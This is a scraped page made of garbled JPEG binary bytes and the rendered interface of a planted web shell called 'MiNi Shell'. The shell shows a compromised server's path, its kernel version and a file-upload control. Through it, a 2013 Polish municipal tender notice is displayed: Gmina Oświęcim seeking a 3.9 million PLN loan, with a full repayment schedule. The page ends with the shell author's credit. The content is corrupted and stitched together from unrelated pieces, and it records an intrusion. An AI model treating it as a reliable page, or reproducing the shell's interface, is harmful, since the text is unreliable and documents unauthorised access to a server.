JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131113/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131113/461224-N-2013.html

<p class="kh_header"><b>Oświęcim: Udzielenie kredytu długoterminowego w wysokości do kwoty 3.900.000,00PLN na sfinansowanie planowanego deficytu budżetu Gminy Oświęcim.</b><br>
<b>Numer ogłoszenia: 461224 - 2013; data zamieszczenia: 13.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Oświęcim , ul. Zamkowa 12, 32-600 Oświęcim, woj. małopolskie, tel. 033 849500, faks 033 8449510.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.oswiecim-gmina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Udzielenie kredytu długoterminowego w wysokości do kwoty 3.900.000,00PLN na sfinansowanie planowanego deficytu budżetu Gminy Oświęcim..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest usługa udzielenia kredytu bankowego długoterminowego w wysokości do kwoty 3.900.000,00 PLN (słownie: trzy miliony dziewięćset tysięcy złotych 00/100) z przeznaczeniem na sfinansowanie planowanego deficytu budżetu Gminy Oświęcim.
2.Uruchomienie kredytu nastąpi w transzach na rachunek podstawowy Gminy. Wysokość i termin przekazania środków będą każdorazowo uzgadniane z Wykonawcą i przedkładane w postaci wniosku na 2 dni robocze przed uruchomieniem transzy.
3.Całkowite uruchomienie kredytu nastąpi do 31 grudnia 2013 roku.
4.Spłata rat kredytu będzie następowała w okresach miesięcznych do ostatniego dnia roboczego miesiąca. Spłata kapitału odbywa się według poniższego harmonogramu:

Lp.	Termin spłaty raty kapitału (rok-miesiąc)	Kwota raty kapitału (w zł)
1	2014-01	                                                               8 333,00
2	2014-02	                                                               8 333,00
3	2014-03	                                                               8 333,00
4	2014-04	                                                               8 333,00
5	2014-05	                                                               8 333,00
6	2014-06	                                                               8 333,00
7	2014-07	                                                               8 333,00
8	2014-08	                                                               8 333,00
9	2014-09	                                                               8 333,00
10	2014-10	                                                               8 333,00
11	2014-11	                                                               8 333,00
12	2014-12	                                                               8 337,00
13	2015-01	                                                          16 666,00
14	2015-02	                                                          16 666,00
15	2015-03	                                                          16 666,00
16	2015-04	                                                          16 666,00
17	2015-05	                                                          16 666,00
18	2015-06	                                                          16 666,00
19	2015-07	                                                          16 666,00
20	2015-08	                                                          16 666,00
21	2015-09	                                                          16 666,00
22	2015-10	                                                          16 666,00
23	2015-11	                                                          16 666,00
24	2015-12	                                                          16 674,00
25	2016-01	                                                          16 666,00
26	2016-02	                                                          16 666,00
27	2016-03	                                                          16 666,00
28	2016-04	                                                          16 666,00
29	2016-05	                                                          16 666,00
30	2016-06	                                                          16 666,00
31	2016-07	                                                          16 666,00
32	2016-08	                                                          16 666,00
33	2016-09	                                                          16 666,00
34	2016-10	                                                          16 666,00
35	2016-11	                                                          16 666,00
36	2016-12	                                                          16 674,00
37	2017-01	                                                          41 666,00
38	2017-02	                                                          41 666,00
39	2017-03	                                                          41 666,00
40	2017-04	                                                          41 666,00
41	2017-05	                                                          41 666,00
42	2017-06	                                                          41 666,00
43	2017-07	                                                          41 666,00
44	2017-08	                                                         41 666,00
45	2017-09	                                                         41 666,00
46	2017-10	                                                         41 666,00
47	2017-11	                                                         41 666,00
48	2017-12	                                                         41 674,00
49	2018-01	                                                         41 666,00
50	2018-02	                                                         41 666,00
51	2018-03	                                                         41 666,00
52	2018-04	                                                         41 666,00
53	2018-05	                                                         41 666,00
54	2018-06	                                                         41 666,00
55	2018-07	                                                         41 666,00
56	2018-08	                                                         41 666,00
57	2018-09	                                                         41 666,00
58	2018-10	                                                         41 666,00
59	2018-11	                                                         41 666,00
60	2018-12	                                                         41 674,00
61	2019-01	                                                         41 666,00
62	2019-02	                                                         41 666,00
63	2019-03	                                                         41 666,00
64	2019-04	                                                         41 666,00
65	2019-05	                                                         41 666,00
66	2019-06	                                                         41 666,00
67	2019-07	                                                         41 666,00
68	2019-08	                                                         41 666,00
69	2019-09	                                                         41 666,00
70	2019-10	                                                         41 666,00
71	2019-11	                                                         41 666,00
72	2019-12	                                                         41 674,00
73	2020-01	                                                         50 000,00
74	2020-02	                                                         50 000,00
75	2020-03	                                                         50 000,00
76	2020-04	                                                         50 000,00
77	2020-05	                                                         50 000,00
78	2020-06	                                                         50 000,00
79	2020-07	                                                         50 000,00
80	2020-08	                                                         50 000,00
81	2020-09	                                                     50 000,00
82	2020-10	                                                     50 000,00
83	2020-11	                                                     50 000,00
84	2020-12	                                                     50 000,00
85	2021-01	                                                     50 000,00
86	2021-02	                                                     50 000,00
87	2021-03	                                                     50 000,00
88	2021-04	                                                     50 000,00
89	2021-05	                                                     50 000,00
90	2021-06	                                                     50 000,00
91	2021-07	                                                    50 000,00
92	2021-08	                                                    50 000,00
93	2021-09	                                                    50 000,00
94	2021-10	                                                    50 000,00
95	2021-11	                                                    50 000,00
96	2021-12	                                                    50 000,00
97	2022-01	                                                    58 333,00
98	2022-02	                                                    58 333,00
99	2022-03	                                                    58 333,00
10	2022-04	                                                    58 333,00
101	2022-05	                                                    58 333,00
102	2022-06	                                                    58 333,00
103	2022-07	                                                    58 333,00
104	2022-08	                                                    58 333,00
105	2022-09	                                                    58 333,00
106	2022-10	                                                    58 333,00
107	2022-11	                                                    58 333,00
108	2022-12	                                                    58 337,00

5.Dopuszcza się możliwość zmiany okresu kredytowania poprzez jego zmniejszenie lub zwiększenie w zależności od wyliczonego indywidualnego wskaźnika spłaty długu, zgodnie z art. 243 ustawy o finansach publicznych. Zamawiający pisemnie poinformuje Wykonawcę o zmianach okresu kredytowania w celu podpisania stosownego aneksu bez ponoszenia dodatkowych opłat (informacja o konieczności dokonania zmian w umowie kredytowej będzie dokonana w terminie wystarczającym do przeprowadzenia uzgodnień oraz weryfikacji zasadności).
6.Dla potrzeb składania oferty Wykonawca zobowiązany jest obliczyć stopę oprocentowania kredytu, jako sumę stawki WIBOR 1M w wysokości 2,59% z dnia 29.10.2013 r. i stałej marży banku. Wyliczoną stopę oprocentowania należy przyjąć jako stała w całym okresie kredytowania. Przyjęcie stawki WIBOR 1M z dnia 29.10.2013 r. ma na celu wyłącznie wybór najkorzystniejszej oferty.
7.Oprocentowanie kredytu będzie zmienne oparte o stawkę WIBOR 1M i dodatnią lub ujemną marżę banku.
8.Odsetki naliczane będą miesięcznie od faktycznie wykorzystanych środków. Do obliczenia kwoty odsetek przyjmuje się rzeczywistą liczbę dni wykorzystania kredytu w stosunku do 366 lub 365 dni w roku.
9.Po otrzymaniu noty odsetkowej z Banku odsetki będą płatne do 15 dnia następnego miesiąca.
10.Pierwsza spłata odsetek nastąpi po upływie miesiąca od daty uruchomienia kredytu.
11.Pierwsza spłata raty kapitałowej nastąpi 31.01.2014 r.
12.Formą zabezpieczenia kredytu przez Kredytobiorcę jest weksel in blanco wraz z deklaracją wekslową.
13.Koszty obsługi kredytu stanowi oprocentowanie kredytu - zmienne. Stopa procentowa kalkulowana jest w oparciu o stawkę WIBOR 1M powiększoną bądź obniżoną o stałą, w całym okresie kredytowania, marżę banku. Aktualizacja stopy procentowej następuje pierwszego dnia roboczego każdego miesiąca kalendarzowego przy użyciu stawki WIBOR 1M z ostatniego dnia roboczego poprzedniego miesiąca kalendarzowego.
14.Zamawiający (kredytobiorca) zastrzega sobie możliwość niepobrania kwoty kredytu w pełnej wysokości. W takim przypadku bank nie obciąży Zamawiającego (kredytobiorcy) kosztami niepobranego kredytu.
15.Zakłada się możliwość wcześniejszych (przed ustalonym terminem) spłat rat kredytu bez ponoszenia dodatkowych opłat.
16.W umowie kredytowej za koszty uznaje się wyłącznie koszt wymieniony w pkt. 3.13) jw.
17.Wykonawca zobowiązany jest do złożenia oświadczenia zawartego w treści formularza oferty stanowiącego załącznik nr 1 do SIWZ, że zobowiązuje się do uruchomienia kredytu zgodnie z pkt. 3.1 i 3.2  jw. oraz wyraża zgodę na:
a. pierwszą spłatę odsetek po miesiącu uruchomienia kredytu,
b. zabezpieczenie kredytu wekslem In blanco wraz z deklaracją wekslową,
c. możliwość niewykorzystania części kredytu przez Zamawiającego bez ponoszenia kosztów,
d. możliwość zmiany okresu kredytowania poprzez jego zmniejszenie lub zwiększenie, w zależności od wyliczonego indywidualnego wskaźnika spłaty długu, zgodnie z art. 243 ustawy o finansach publicznych, w formie aneksu bez ponoszenia dodatkowych kosztów(informacja o konieczności dokonania zmian w umowie kredytowej będzie dokonana w terminie wystarczającym do przeprowadzenia uzgodnień oraz weryfikacji zasadności)
18.Dokumenty Zamawiającego załączono na stronie internetowej BIP w plikach do pobrania.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 66.11.30.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.12.2022.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wzór formularza oferty.
2. Kalkulacja ceny kredytu - Wykonawca obowiązany jest opracować kalkulację ceny kredytu ściśle według załączonego wzoru</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.oswiecim-gmina.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Oświęcim
ul. Zamkowa 12
32-600 Oświęcim.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.12.2013 godzina 10:00, miejsce: Urząd Gminy Oświęcim
ul. Zamkowa 12
32-600 Oświęcim
pok. 33.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com